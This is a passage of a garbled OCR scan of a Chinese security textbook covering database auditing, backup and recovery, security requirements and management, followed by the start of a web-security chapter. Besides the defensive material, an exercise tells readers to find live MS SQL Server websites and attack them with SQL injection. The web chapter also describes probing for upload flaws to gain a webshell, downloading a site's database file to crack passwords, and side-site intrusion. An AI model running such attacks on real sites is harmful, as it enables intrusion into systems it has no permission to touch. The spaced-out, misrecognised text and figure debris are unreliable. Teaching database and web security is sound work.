系统 的 运行 效率 降低 、 难 以 实现 对 数据 完整 性 约束 的 定义 、 对 数据 的 SQL 语言 及 SQL 函数 
的 使 用 受到 制约 、 密 文 数据 容易 成 为 攻击 目标 等 。 

5. 数据 库 审计 

数据 库 审计 是 指 监视 和 记录 用 户 对 数据 库 所 施加 的 各 种 操作 的 机 制 。 按 照 美国 国防 部 
TCSEC/TDI 标准 中 关于 安全 策略 的 要 求 , 审 计 功 能 是 数据 库 系统 达到 C2 以 上 安全 级 别 必 
不 可 少 的 一 项 指标 。 

审计 功能 自动 记录 用 户 对 数据 库 的 所 有 操作 ,并 且 存 入 审计 日 志 。 事 后 可 以 利用 这 些 
信息 重 现 导致 数据 库 现 有 状况 的 一 系列 事件 ,提供 分 析 攻 击 者 线索 的 依据 。 

数据 库 管理 系统 的 审计 主要 分 为 语句 审计 、 特 权 审 计 、 模 式 对 象 审 计 和 资源 审计 。 

语句 审计 : 指 监视 一 个 、 多 个 特定 用 户 或 者 所 有 用 户 提 交 的 SQL 语句 。 

特权 审计 : 指 监视 一 个 、 多 个 特定 用 户 或 者 所 有 用 户 使 用 的 系统 特权 。 

模式 对 象 审计 : 指 监 视 一 个 模式 中 在 一 个 或 者 多 个 对 象 上 发 生 的 行为 。 

资源 审计 : 指 监视 分 配给 每 个 用 户 的 系统 资源 。 

审计 机 制 应 该 至 少 记 录用 户 标识 和 认证 、 客 体 访问 、 授 权 用 户 进 行 并 会 影响 系统 安全 的 
操作 ,以 及 其 他 安全 相关 事件 。 对 于 每 个 记录 的 事件 ,审计 记录 中 需要 包括 事件 时 间 、 用 户 、 
时 间 类 型 .事件 数据 和 事件 的 成 功 /失败 情况 。 对 于 标识 和 认证 事件 ,必须 记录 事件 源 的 终 
端 ID 和 源 地 址 等 ; 对 于 访问 和 删除 对 象 的 事件 , 则 需要 记录 对 象 的 名 称 。 

对 于 审计 粒度 与 审计 对 象 的 选择 ,需要 考虑 系统 运行 效率 与 存储 空间 消耗 的 问题 。 为 
了 达到 审计 目的 ,一 般 必须 审计 到 对 数据 库 记 录 与 字段 一 级 的 访问 。 但 这 种 小 粒度 的 审计 
需要 消耗 大 量 的 存储 空间 ,同时 使 系统 的 响应 速度 降低 ,给 系统 运行 效率 带 来 影响 。 
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6. 备份 与 恢复 

一 个 数据 库 系统 总 是 避免 不 了 故障 的 发 生 。 安 全 的 数据 库 系 统 必须 能 在 系统 发 生 故障 
后 利用 已 有 的 数据 备份 ,恢复 数据 库 到 原来 的 状态 ,并 保持 数据 的 完整 性 和 一 致 性 。 数 据 库 
系统 所 采用 的 备份 与 恢复 技术 ,对 系统 的 安全 性 与 可 靠 性 起 着 重要 作用 ,也 对 系统 的 运行 效 
率 有 着 重大 影响 。 

(1) 数据 库 备份 

常用 的 数据 库 备份 方法 有 冷 备份 热 备份 和 逻辑 备份 。 

(D 冷 备份 。 冷 备份 是 在 没有 终端 用 户 访问 数据 库 的 情况 下 关闭 数据 库 并 将 其 备份 ,又 
称 为 “ 脱 机 备份 ”。 这 种 方法 在 保持 数据 完整 性 方面 显然 最 有 保障 ,但 是 对 于 那些 必须 保持 
24X7 全 天 候 运行 的 数据 库 服务 器 来 说 , 较 长 时 间 地 关闭 数据 库 进行 备份 是 不 现实 的 。 

O 热 备份 。 热 备份 是 指 当 数据 库 正 在 运行 时 进行 的 备份 ,又 称 为 “联机 备份 ”” 因 为 数 
据 备份 需要 一 段 时 间 ,而 且 备份 大 容量 的 数据 库 还 需要 较 长 的 时 间 ,那么 在 此 期 间 发 生 的 数 
据 更 新 就 有 可 能 使 备份 的 数据 不 能 保持 完整 性 ,这 个 问题 的 解决 依赖 于 数据 库 日 志文 件 。 
在 备份 时 ,日 志文 件 将 需要 进行 数据 更 新 的 指令 “ 堆 起 来 ”, 并 不 进行 真正 的 物理 更 新 ,因此 
数据 库 能 被 完整 地 备份 。 备 份 结束 后 ,系统 再 按照 被 日 志文 件 “ 堆 起 来 ”的 指令 对 数据 库 进 
行 真正 的 物理 更 新 。 可 见 , 被 备份 的 数据 保持 了 备份 开始 时 刻 前 的 数据 一 致 性 状态 。 不 过 ， 
热 备份 本 身 要 占用 相当 一 部 分 的 系统 资源 ,因而 系统 的 运行 效率 会 有 所 下 降 。 

热 备份 操作 存在 如 下 不 利 因素 。 

如 果 系 统 在 备份 时 骨 溃 , 则 堆 在 日 志文 件 中 的 所 有 事务 都 会 丢失 , 即 造成 数据 的 丢失 。 

如 果 日 志文 件 占用 系统 资源 过 大 ,将 系统 存储 空间 占用 完 , 会 造成 系统 不 能 接受 新 的 业 
务 请 求 ,对 系统 的 运行 产生 影响 。 

@ 偿 辑 备份 。 逻 辑 备份 是 指使 用 软件 技术 从 数据 库 中 导出 数据 并 写 入 一 个 输出 文件 ,该 
文件 的 格式 一 般 与 原 数据 库 的 文件 格式 不 同 ,而 是 原 数 据 库 中 数据 内 容 的 一 个 映像 。 因 此 好 
辑 备 份 文件 只 能 用 来 对 数据 库 进 行 逻辑 恢复 ( 即 数 据 导入 ) ,而 不 能 按 数据 库 原来 的 存储 特征 
进行 物理 恢复 。 好 辑 备份 一 般 用 于 增 量 备份 , 即 备份 那些 在 上 次 备份 以 后 改变 的 数据 。 

(2) 数据 库 恢 复 

在 系统 发 生 故 障 后 ,把 数据 库 恢复 到 原来 的 某 种 一 致 性 状态 的 技术 称 为 恢复 ,其 基本 原 
理 是 利用 宛 余 进 行 数据 库 恢 复 。 问 题 的 关键 是 如 何 建立 完 余 并 利用 宛 余 实 施 数 据 库 恢 复 ， 
即 恢复 策略 。 

数据 库 恢 复 技术 一 般 有 3 种 策略 : 基于 备份 的 恢复 、 基 于 运行 时 日 志 的 恢复 和 基于 镜 
像 数 据 库 的 恢复 。 

D 基于 备份 的 恢复 。 基 于 备份 的 恢复 是 指 周期 性 地 备份 数据 库 。 当 数据 库 失效 时 ,可 
取 最 近 一 次 的 数据 库 备份 来 恢复 数据 库 , 即 把 备份 的 数据 复制 到 原 数据 库 所 在 的 位 置 。 用 
这 种 方法 ,数据库 只 能 恢复 到 最 近 一 次 备份 的 状态 ,而 从 最 近 备 份 到 故障 发 生 期 间 的 所 有 数 
据 库 更 新 将 会 丢失 。 备 份 的 周期 越 长 ,丢失 的 更 新 数据 越 多 。 

© 基于 运行 时 日 志 的 恢复 。 运 行 时 日 志文 件 是 用 来 记录 对 数据 库 每 一 次 更 新 操作 的 
文件 。 对 日 志 的 操作 优先 于 对 数据 库 的 操作 ,以 确保 记录 数据 库 的 更 改 。 当 系统 突然 失效 
而 导致 事务 中 断 时 ,可 重新 装 入 数据 库 的 副本 ,把 数据 库 恢复 到 上 一 次 备份 时 的 状态 。 然 后 
系统 自动 正 向 扫描 日 志文 件 ,将 故障 发 生前 所 有 提交 的 事务 放 到 重 做 队列 ,将 未 提交 的 事务 
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放 到 撤销 队列 执行 ,这 样 就 可 把 数据 库 恢复 到 故障 前 某 一 时 刻 的 数据 一 致 性 状态 。 

© 基于 镜像 数据 库 的 恢复 。 数 据 库 镜像 就 是 在 另 一 个 磁盘 上 复制 数据 库 作 为 实时 副 
本 。 当 主 数据 库 更 新 时 ,DBMS 自动 把 更 新 后 的 数据 复制 到 镜像 数据 ,始终 使 镜像 数据 和 
主 数据 保持 一 致 性 。 当 主 库 出 现 故障 时 ,可 由 镜像 磁盘 继续 提供 使 用 ,同时 DBMS 自动 利 
用 镜像 磁盘 数据 进行 数据 库 恢 复 。 镜 像 策略 可 以 使 数据 库 的 可 靠 性 大 为 提高 ,但 由 于 数据 
库 镜 像 通过 复制 数据 实现 ,频繁 地 复制 会 降低 系统 运行 效率 ,因此 一 般 在 对 效率 要 求 满足 的 
情况 下 可 以 使 用 。 为 兼顾 可 靠 性 和 可 用 性 ,可 有 选择 性 地 镜像 关键 数据 。 

数据 库 的 备份 和 恢复 是 一 个 完善 的 数据 库 系统 必 不 可 少 的 一 部 分 ,目前 这 种 技术 已 经 
广泛 应 用 于 数据 库 产品 


6.3.3 数据 库 系统 安全 需求 


与 其 他 计算 机 系统 (如 操作 系统 ) 的 安全 需求 类 似 , 数 据 库 系 统 的 安全 需求 可 以 归纳 为 
完整 性 ,保密 性 和 可 用 性 3 个 方面 。 

1. 完整 性 

数据 库 系统 的 完整 性 主要 包括 物理 完整 性 、 迎 辑 完 整 性 和 元 素 完 整 性 。 

物理 完整 性 : 是 指 保证 数据 库 的 数据 不 受 物理 故障 (如 硬件 故障 、 火 灾 或 掉 电 等 ) 的 影 
响 ,并 有 可 能 在 灾难 性 毁坏 时 重建 和 恢复 数据 库 。 

逻辑 完整 性 : 是 指 系统 能 够 保持 数据 库 的 结构 不 受 破 坏 , 如 对 一 个 字段 的 修改 不 至 
于 影响 到 其 他 字段 。 对 数据 库 逻 辑 结 构 的 保护 包括 数据 语义 与 操作 完整 性 ,前 者 主要 
指数 据 存 取 在 逻辑 上 满足 完整 性 约束 ; 后 者 主要 指 在 并 发 事务 中 保证 数据 的 迎 辑 一 
致 性 。 

元 素 完 整 性 : 是 指 包括 在 每 个 元 素 中 的 数据 是 准确 的 。 

2. 保密 性 

数据 库 的 保密 性 是 指 不 允许 未 经 授权 的 用 户 存 取 数据 。 数 据 库 的 保密 性 包括 访问 控 
制 . 用 户 认 证 .审计 跟踪 、 数 据 加 密 等 内 容 。 一 般 要 求 对 用 户 的 身份 进行 标识 与 鉴别 ,并 采取 
相应 的 存 取 控制 策略 以 保证 用 户 仅 能 访问 授权 数据 ,同一 组 数据 的 不 同 用 户 可 以 被 赋予 不 
同 的 存 取 权 限 。 同 时 ,还 应 能 够 对 用 户 的 访问 操作 进行 跟踪 和 审计 。 此 外 ,还 应 该 控制 用 户 
通过 推理 方式 从 经 过 授权 的 已 知 数据 获取 未 经 授权 的 数据 ,造成 信息 泄露 。 

3. 可 用 性 

数据 库 的 可 用 性 是 指 不 应 拒绝 授权 用 户 对 数据 库 的 正常 操作 ,同时 保证 系统 的 运行 效 
率 并 提供 用 户 友 好 的 人 机 交互 。 

数据 库 的 保密 性 与 可 用 性 是 一 对 矛盾 ,对 这 个 矛盾 的 分 析 与 解决 构成 了 数据 库 系统 的 
安全 模型 和 安全 机 制 。 


64 数据 库 系 统 安 全 管理 


一 个 强大 的 数据 库 安 全 系统 应 当 确 保 其 中 信息 的 安全 性 并 对 其 有 效 地 控制 。 下 面 列 
举 的 原则 有 助 于 企业 在 安全 规划 中 实现 客户 利益 保障 ,策略 制定 以 及 对 信息 资源 的 有 效 
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保护 。 

1. 管理 细 分 和 委派 原则 

在 典型 的 数据 库 工作 环境 中 ,DBA 总 是 独立 执行 所 有 的 管理 和 其 他 事务 工作 ,一 旦 出 
现 岗 位 交替 ,将 带 来 一 连 串 问题 和 工作 效率 的 低下 。 通 过 管理 责任 细 分 和 任务 委派 ,DBA 
将 得 以 从 常规 事务 中 解脱 出 来 ,而 更 多 地 关注 于 解决 数据 库 执行 效率 以 及 管理 相关 的 重要 
问题 ,从 而 保证 两 类 任务 的 高 效 完成 。 企 业 应 设法 通过 功能 和 可 信赖 的 用 户 群 进 一 步 细 分 
数据 库 管 理 的 责任 和 角色 。 管 理 委 派 有 助 于 灵活 解决 为 员工 重 设 密码 (需要 管理 员 权限 ) 这 
样 的 常见 问题 ,或 者 让 管理 员 执 行 特 殊 部 门 (如 市 场 部 或 财务 部 ) 的 某 些 事务 。 

2. 最 小 权限 原则 

许多 新 的 保密 规则 针对 特定 数据 的 授权 访问 。 企 业 必须 本 着 “最 小 权限 ”原则 ,从 需求 
和 工作 职能 两 方面 严格 限制 对 数据 库 的 访问 权 。 通 过 角色 (role) 的 合理 运用 ,最 小 权限 可 
确保 数据 库 功 能 限制 和 对 特定 数据 的 访问 。 

3. 账号 安全 原则 

用 户 账号 对 于 每 一 个 数据 库 连 接 来 说 都 是 必需 的 。 账 号 应 遵循 传统 的 用 户 账号 管理 方 
法 来 进行 安全 管理 。 这 些 方法 包括 : 更 改 默认 密码 ; 应 用 适当 的 密码 设置 ; 当 登 录 失 败 时 
实施 账号 锁定 ; 对 数据 提供 有 限制 的 访问 权限 ; 禁止 休眠 状态 的 账户 ,以 及 管理 账户 的 生 
命 周 期 等 。 

4. 有 效 的 审计 

数据 库 审计 是 数据 库 安全 的 基本 要 求 。 企 业 应 针对 自己 的 应 用 和 数据 库 活动 定义 审计 
策略 。 审 计 并 非 一 定 要 按 * 要 么 对 所 有 目标 ,要 么 没有 ”审计 的 粗放 模式 进行 ,从 这 一 点 来 
看 ,智能 审计 的 实现 对 安全 管理 意义 重 少 执行 所 涉及 的 范 
围 和 对 象 ; 通过 智能 限制 日 志 大 小 ,还 能 突出 更 加 关键 的 安全 事件 。 

5. 数据 库 的 备份 

计算 机 系统 有 许多 种 故障 类 型 ,诸如 机 械 损坏 、 电 源 故 障 、 自 然 灾 害 、 错 误 使 用 、 恶 意 破 
坏 等 。 如 果 没 有 数据 备份 ,那么 一 旦 产生 故障 就 不 可 能 恢复 丢失 的 数据 ,所 以 要 求 进行 合理 
的 对 数据 库 中 的 数据 进行 备份 。 定 期 备份 数据 库 是 最 稳妥 的 防止 故障 发 生 的 方法 , 它 能 有 
效 地 恢复 数据 。 建 立 一 个 完整 的 备份 策略 需要 考虑 的 因素 如 下 。 

(1) 备份 周期 ,根据 数据 的 重要 程度 ,可 以 选择 每 周 、 每 日 、 每 时 进行 备份 。 

(2) 使 用 静态 备份 还 是 动态 备份 ,动态 备份 允许 数据 库 运行 时 进行 备份 。 

(3) 使 用 全 备份 还 是 共同 使 用 全 备份 和 增 量 备份 。 

(4) 使 用 什么 存储 介质 ,磁带 、 磁 盘 还 是 光盘 。 

(5) 使 用 人 工 备份 还 是 设计 好 的 自动 备份 程序 。 

(6) 检验 备份 完整 性 的 周期 。 

CD 备份 存储 的 空间 是 否 防 窃 .防磁 干扰 .防火 。 

(8) 是 否 指定 其 他 人 实行 备份 ,他 们 是 否 享 有 必要 的 登录 号 和 口令 。 

(9) 在 负责 备份 和 恢复 的 主要 人 员 缺 席 的 情况 下 ,是 否 有 其 他 人 能 代替 他 们 。 
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65 本 章 小 结 


本 章 介 绍 了 SQL 注入 式 攻 击 的 原理 ,对 SQL 注入 式 攻 击 的 防范 、 常 见 的 数据 库 安 全 问 
题 及 安全 威胁 、 数 据 库 安全 管理 原则 等 内 容 , 并 且 通 过 对 一 系列 实例 的 介绍 ,加 深 读 者 对 数 
据 库 安全 管理 方面 的 基础 知识 和 技术 的 理解 ,帮助 读者 提高 维护 数据 库 安全 的 能 力 , 并 且 在 
进行 Web 开发 时 要 注意 防范 SQL 注入 式 攻 击 。 


66 J 题 
1. 填空 题 
OD 是 指 攻击 者 通过 黑 盒 测 试 的 方法 检测 目标 网 站 脚本 是 否 存在 过 滤 不 严 的 


问题 ,如 果 有 ,那么 攻击 者 就 可 以 利用 某 些 特殊 构造 的 SQL 语句 ,通过 在 浏览 器 直接 查询 管 
理 员 的 用 户 名 和 密码 ,或 者 利用 数据 库 的 一 些 特性 进行 权限 提升 。 


(2) 数据 库 系 统 分 为 和 。 
(3) 只 有 调用 数据 库 动 态 页 面 才 有 可 能 存在 注入 漏洞 ,动态 页 面包 括 
和 等 。 

(4) 是 一 个 强大 免费 开源 的 自动 化 SQL 注入 工具 ,主要 功能 是 扫描 ,发 现 并 
利用 给 定 的 URL 的 SQL 注入 漏洞 。 

(5) 从 广义 上 讲 , 数 据 库 系统 的 安全 框架 可 以 分 为 三 个 层次 : . 
和 

(6) 常用 的 数据 库 备 份 方法 有 和 

(7) 数据 库 系统 的 安全 需求 有 : 和 

(8) 数据 库 安全 管理 原则 有 s 和 

2. 思考 与 简 答 题 


COD 阐述 注入 攻击 MS SQL Server 的 一 般 过 程 。 

(2) 阐述 注入 攻击 Access 的 一 般 过 程 。 

(D 如 何 防范 SQL 注入 攻击 ? 

3. 上 机 题 

COD 根据 6.1. 4 小 节 搭 建 实验 环境 ,使 用 SQLmap 进行 SQL 注入 攻击 。 

(2) 在 网 络 上 寻找 使 用 MS SQL Server 的 动态 网 站 ,然后 对 其 进行 SQL 注入 攻击 。 
(注意 : 主要 是 为 了 实验 ,不 要 有 违法 行为 。) 
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本 章 学 习 目 标 

* 了 解 Web 应 用 的 安全 现状 。 

* THE XSS 跨 站 攻击 技术 。 

。 掌握 电子 邮件 加 密 技 术 。 

。 了解 防 垃圾 邮件 技术 。 

。 掌握 Kali Linux 中 创建 Wi-Fi 热点 。 

。 了解 网 上 银行 账户 安全 常识 。 

。 掌握 WinHex 的 一 般 使 用 方法 。 

人 们 的 生活 越 来 越 离 不 开 网 络 ,但 是 目前 的 网 络 环境 隐藏 着 种 种 威胁 ,因此 本 章 通过 介 
绍 Web 应 用 安全 .电子 邮件 加 密 技 术 、 防 垃圾 邮件 技术 .Kali Linux 中 创建 Wi-Fi 热点 
网 上 银行 账户 安全 常识 ,来 提高 读者 安全 使 用 网 络 的 水 平 。 
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至 2015 年 年 底 , 全 球 互联 网 用 户 将 达 32 亿 , 许 多 用 户 会 利用 网 络 进行 购物 、 银 行 转账 
支付 和 各 种 软件 下 载 。 而 近年 来 互联 网 的 环境 发 生 了 很 大 的 变化 , Web 2.0 成 为 互联 网 热 
门 的 概念 ,Web 2. 0 相关 技术 和 应 用 的 发 展 使 得 在 线 协 作 ` 共 享 更 加 方便 。Web 2.0 技术 主 
要 包括 博客 (BLOG) ,播客 .RSS、 百 科 全 书 (Wiki) 、P2P、 即 时 信息 (IM) 等 。 人 们 在 享受 网 
络 便捷 的 同时 ,网 络 环境 也 变 得 越 来 越 危险 。 

Web 威胁 正在 极力 表现 它 的 逐 利 性 ,成 为 当前 网 络 威 胁 最 突出 的 代表 。 近 年 来 类 似 
Melissa, I love you 等 这 些 扩散 全 球 性 的 “大 ”病毒 屈指 可 数 . 取 而 代 之 的 是 无 声 无 息 的 Web 
威胁 ,它们 共同 的 特性 是 窃取 数据 加 以 贩卖 。 在 中 国 更 发 展 出 区 域 性 的 病毒 ,如 熊猫 烧香 、 
KFA ANI 蠕虫 。 

由 于 新 一 代 的 Web 威胁 具备 混合 型 .定向 攻击 和 区 域 性 爆发 等 特点 ,所 以 传统 防护 效 
果 越 来 越 差 , 难 防 Web 威胁 。 因 此 ,普通 的 浏览 网 页 都 变 成 了 一 件 带 有 极 大 安全 风险 的 事 
Tii. Web 威胁 可 以 在 用 户 完全 没有 察觉 的 情况 下 进入 网 络 .从 而 对 公司 数据 资产 ,行业 信 
誉 和 关键 业务 构成 极 大 威胁 。 据 Gartner 统计 ,企业 由 于 定向 攻击 遭受 的 损失 将 至 少 5 倍 
于 其 他 事件 造成 的 损失 。 而 面 对 Web 威胁 ,传统 的 安全 防护 手段 已 经 不 能 满足 保护 网 络 的 
要 求 了 。 

据 趋势 科技 统计 ,目前 40% 的 病毒 会 自我 加 密 或 采用 特殊 程序 压缩 ; 90% 的 病毒 以 
HTTP 为 传播 途径 ; 60% 的 病毒 以 SMTP 为 传播 途径 ; 50% 的 病毒 会 利用 开机 自动 执行 或 


自动 连 上 恶意 网 站 下 载 病毒 。 这 些 数 据 表 明 ,威胁 正 向 定向 、 复 合式 攻击 方向 发 展 , 其 中 一 
种 攻击 会 包括 多 种 威胁 ,比如 病毒 .蠕虫 特洛伊 ,间谍 软件 .僵尸 、 网 络 钓鱼 电子 邮件 、 漏 洞 
利用 、. 下 载 程序 .社会 工程 .rootkit、` 黑客 等 ,造成 拒绝 服务 .服务 劫持 、 信 息 泄 露 或 筑 改 等 危 
害 。 另 外 ,复合 攻击 也 加 大 了 收集 所 有 “样本 ”的 难度 ,造成 的 损害 也 是 多 方面 的 ,潜伏 期 难 
以 预测 ,甚至 可 以 远程 可 控 地 发 作 。 

随 着 多 形态 攻击 的 数量 增多 ,传统 防护 手段 的 安全 效果 也 越 来 越 差 ,总 是 处 于 预防 威 
胁 一 检测 威胁 一 处 理 威 胁 一 策略 执行 的 循环 之 中 。 面 对 来 势 测 测 的 新 型 Web 威胁 ,传统 的 
防护 模式 已 经 过 于 陈旧 。 面 对 目前 通过 Web 传播 的 复合 式 攻击 ,无 论 是 代码 比 对 、 行 为 分 
析 、 内 容 过 滤 ,还 是 端口 封闭 、 统 计 分 析 ,都 表现 得 无 能 为 力 。 单 一 的 安全 产品 在 对 付 复合 攻 
击 时 也 明显 地 力不从心 。 

据 Google 的 高 级 软件 工程 师 Neils Provos 所 述 , 在 过 去 的 一 年 中 Google 通过 对 互联 
网 上 几 十 亿 页 面 地 址 进行 抓 取 ,已 经 发 现 300 万 个 网 站 存在 恶意 软件 ,这 意味 着 每 打开 
1000 个 页 面 ,就 有 一 个 是 存在 恶意 软件 的 网 站 。 

这 些 攻击 类 型 即 所 谓 的 “隐蔽 强迫 下 载 ”(drive-by downloads) ,安全 专家 发 现 近 些 年 这 
种 攻击 方式 已 经 变 得 比 蠕虫 病毒 或 者 其 他 病毒 更 加 普遍 。 网 络 上 的 罪犯 利用 这 种 攻击 方 
式 ,在 网 站 上 寻找 各 种 编程 漏洞 ,然后 利用 漏洞 放 上 这 些 恶 意 软件 。 在 过 去 的 一 年 中 ,有 不 
少 网 站 就 被 这 种 方式 所 攻击 ,例如 美国 前 副 总 统 戈 尔 的 环保 宣传 片 4( 不 可 忽视 的 真相 》 网 站 
曾经 被 黑客 放 上 恶意 程序 , MySpace 上 的 文件 漏洞 也 曾 被 黑客 利用 来 攻击 游客 。 

对 此 ,Google 在 搜索 结果 中 对 存在 恶意 软件 的 网 页 提出 警告 ,在 Google 搜索 结果 的 前 
几 页 ,有 1.3% 的 网 站 被 Google 检查 出 了 恶意 软件 。Google 的 研究 结果 显示 ,中 国 的 恶意 
站 点 占 到 了 总 数 的 67% ,而 美国 为 15 96 俄罗斯 为 4% 、 马 来 西亚 为 2. 296 、 韩 国 为 2%。 根 
据 调查 结果 ,恶意 站 点 有 逐步 上 升 的 势头 。 


7.1.1 Web 技术 简介 与 安全 分 析 


Web 是 World Wide Web 的 简称 , 即 万 维 网 。Web 服务 是 指 采用 B/S 架构 (Brower/ 
Server) ,通过 HTTP 协议 提供 服务 的 统称 ,这 种 结构 也 称 为 Web 架构 。 

1. Web 服务 器 

服务 器 结构 中 规定 了 服务 器 的 传输 设 定 、 信 息 传输 格式 及 服务 器 本 身 的 基本 开放 结构 。 
Web 服务 器 是 驻 留 在 服务 器 上 的 软件 , 它 汇集 了 大 量 的 信息 。Web 服务 器 的 作用 就 是 管理 
这 些 文档 , 按 用 户 的 要 求 返回 信息 。 

UNIX/Linux 系统 中 的 Web 服务 器 多 采用 Apache 服务 器 软件 ; Windows 系统 中 的 
Web 服务 器 多 采用 IIS (Internet Information Server) 服 务 器 软件 。 目 前 .Apache 服务 器 软 
件 占据 最 大 的 市 场 份额 :并且 可 以 在 多 种 环境 下 运行 ,如 UNIX, Linux, Solaris, 
Windows 等 。 

2. Web 浏览 器 

Web 浏览 器 用 于 向 服务 器 发 送 资源 索取 请 求 , 并 将 接收 到 的 信息 进行 解码 和 显示 。 
Web 浏览 器 从 Web 服务 器 下 载 和 获取 文件 ,翻译 下 载 文件 中 的 HTML 代码 ,进行 格式 化 ， 
根据 HTML 中 的 内 容 在 屏幕 上 显示 信息 。 如 果 文 件 中 包含 图 像 以 及 其 他 格式 的 文件 (如 
声 频 、 视 频 、Flash 等 ),Web 浏览 器 会 作 相应 的 处 理 或 依据 所 支持 的 插件 进行 必要 的 显示 。 
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常见 的 Web 浏览 器 软件 有 Firefox、IE(Internet Explorer) , Chrome 等 。 

3. 通信 协议 

通信 协议 是 指 HTTP 协议 (HyperText Transfer Protocol, 超 文本 传输 协议 ),Web 浏 
览 器 与 服务 器 之 间 遵循 HTTP 协议 进行 通信 传输 。HTTP 是 分 布 式 的 Web 应 用 的 核心 技 
RUNX. TE TCP/IP 协议 栈 中 属于 应 用 层 。 它 定义 了 Web 浏览 器 向 Web 服务 器 发 送 索 取 
Web 页 面 请 求 的 格式 ,以 及 Web 页 面 在 Internet 上 的 传输 方式 。 一 般 情况 下 ,Web 服务 器 
在 80 端口 监听 ,等 待 Web 浏览 器 的 请 求 ,Web 浏览 器 通过 3 次 握手 与 Web 服务 器 建立 起 
TCP/IP 连接 。 

4. HTML 和 JavaScript 语言 

(1) HTML 

HTML( HyperText Markup Language, 超 文本 标记 语言 ) 是 一 种 用 来 制作 网 页 的 标记 
语言 , 它 不 需要 编译 ,可 以 直接 由 浏览 器 执行 ,属于 浏览 器 解释 型 语言 。 

(2) JavaScript 

JavaScript 是 一 种 面向 对 象 的 描述 语言 ,可 以 用 来 开发 Internet 客户 端的 应 用 程序 。 

建立 一 个 名 为 javascript. html 的 文件 ,如 图 7-1 所 示 o 

在 IE 中 打开 javascript. html 文件 ,可 以 看 到 如 图 7-2 所 示 的 窗口 。 


<html> 
<head> 
<title> r 
Hello, JavaScript? AD E)r: NRD javascript htl M| EJ 秆 到 ds 


</title> 
<ħ1> Mello, JavaScript? </h1><hr> 
/head» 


Hello, JavaScript! 


<body> 
«p? o avascriptEt «p 


err EE Lage. erai, | | TBI 
Con 这 是 用 JS 的 对 象 生成 的 Hello，Worl1d! 
</html>] 
7-1 javascript. html 文件 图 7-2 在 IE 中 打开 javascript, html 文件 


从 图 7-2 中 可 以 看 出 ,一 script 二 和 二 /script 二 之 间 的 内 容 是 JavaScript 代码 。 支 持 
JavaScript 的 浏览 器 会 自动 解释 JavaScript 的 代码 的 。 在 标记 过 script 二 中 可 以 指定 语言 ， 
如 过 script language =" JavaScript" 过。 在 没有 指定 的 情况 下 ,IE 和 Firefox 默认 为 
JavaScript( 在 IE 中 还 可 以 用 VBScript ,必须 指定 language— " VBScript"), javascript. html 
中 使 用 了 document 对 象 ,这 个 对 象 是 JavaScript 中 最 重要 的 对 象 之 一 。document 对 象 的 
一 个 方法 称 为 write, 是 用 于 在 浏览 器 中 输出 字符 串 的 。 整 个 JavaScript 系统 是 一 个 对 象 的 
集合 ,灵活 使 用 JavaScript 就 是 灵活 使 用 这 个 对 象 系统 。 

修改 javascript. html 的 文件 ,如 图 7-3 所 示 。 在 JavaScript 脚本 中 定义 了 一 个 函数 
testAlert() 。 在 网 页 中 有 一 个 按钮 对 象 , 当 单 击 该 按钮 时 ,执行 相应 的 JavaScript 函数 
testAlert() 。 在 IE 中 打开 javascript. html 文件 .可 以 看 到 如 图 7-4 所 示 的 窗口 。 

5. WebShell 

WebShell 具有 可 以 管理 Web, 修改 主页 内 容 的 权限 ,如果 要 修改 别人 的 主页 ,一 般 都 需 
要 这 个 权限 ,上 传 漏洞 要 得 到 的 也 是 这 个 权限 。 如 果 某 个 服务 器 的 权限 设置 得 不 好 ,那么 通 
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em 
«nead» 
<title> 
Hello, JavaScriptt--function 
</title> 
nest» 地 址 Q) (E) r: MDIBNRCIE REI javascript htal v. EJ 999 


«body» 
<script language-"JavaScript"» 
Function test&lertQ( 

var teststring-" 这 是 Js 定义 的 变量 " 


window.alert(teststring); 


script? 
<input type="button" value=" 执 行 "onClick="testalert()"> 
</body> 
/ntnl> 
图 7-3 ”修改 后 的 javascript. html 文件 图 7-4 在 正中 打开 javascript. html 文 件 
6. 上 传 漏洞 


在 浏览 器 地 址 栏 中 网 址 的 后 面 加 上 “/upfile. asp”( 或 与 此 含义 相近 的 名 字 ) ,如 果 显 示 
“上 传 格式 不 正确 ”等 类 似 的 提示 ,说 明 存在 上 传 漏洞 ,可 以 用 上 传 工具 得 到 WebShell。 

7. RE 

这 个 漏洞 现在 已 经 很 少见 了 ,但 是 还 有 一 些 站 点 存在 这 个 漏洞 可 以 利用 。 暴 库 就 是 通 
过 猜测 数据 库 文件 所 在 的 路 径 来 将 其 下 载 ,得 到 该 文件 后 就 可 以 破解 该 网 站 的 用 户 密 码 了 。 
比如 ,在 Firefox 浏览 器 地 址 栏 中 输入 http://localhost/bbsxp/database/bbsxp2008. mdb, 
可 以 将 此 网 站 的 数据 库 文件 下 载 。 

8. Sit 

当 和 侵 A 网 站 时 发 现 这 个 网 站 无 懈 可 击 , 此 时 可 从 与 A 网 站 在 同一 服务 器 的 BB 网 站 入 
T.AB B 网 站 后 ,利用 B 网 站 得 到 服务 器 的 管理 员 权 限 .从 而 获得 了 对 A 网 站 的 控制 权 。 

9. CGI 

CGICCommon Gateway Interface, 公 共 网 关 接 口 ) 是 运行 在 服务 器 上 的 一 段 程序 。 绝 
大 多 数 CGI 程序 被 用 来 解释 处 理 来 自 浏览 器 表单 的 输入 信息 ,并 在 服务 器 产生 相应 的 处 
理 , 或 将 相应 的 信息 反馈 给 浏览 器 。CGI 程序 使 网 页 具有 交互 功能 。CGI 可 以 用 任何 一 种 
语言 编写 ,只 要 这 种 语言 具有 标准 输入 、 输 出 和 环境 变量 。UNIX/Linux 环境 中 有 Perl 
(Practical. Extraction and Report Language), Bourne Shell, TCL ( Tool Command 
Language),C 语言 等 。Windows 环境 中 有 C/C „Perl 等 。 

10. Web 系统 架构 

Web 系统 的 一 般 架 构 如 图 7-5 所 示 。 


HTTP 请 求 


^ o > 用 户 
g 


HTTP 应 答 (网 页 文件 ) 


2 


SEDIT 


7-5 Web 系统 架构 
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用 户 使 用 Web 浏览 器 ,通过 网 络 连 接 到 Web 服务 器 。 用 户 发 出 请 求 ,服务 器 根据 请 求 
的 URL, 找 到 对 应 的 网 页 文件 ,发 送 给 用 户 。 网 页 文件 是 HTML/XML 格式 的 文本 文件 ， 
Web 浏览 器 有 一 个 解释 器 ,将 网 页 文本 转换 成 Web 浏览 器 中 看 到 的 网 页 。 

用 户 访问 的 页 面 网 页 文件 一 般 存放 在 Web 服务 器 的 某 个 目录 下 ,通过 网 页 上 的 超 链接 
可 以 获得 网 站 上 的 其 他 网 页 ,这 是 静态 网 页 。 这 种 方式 只 能 单 向 地 给 用 户 展示 信息 ,但 让 用 
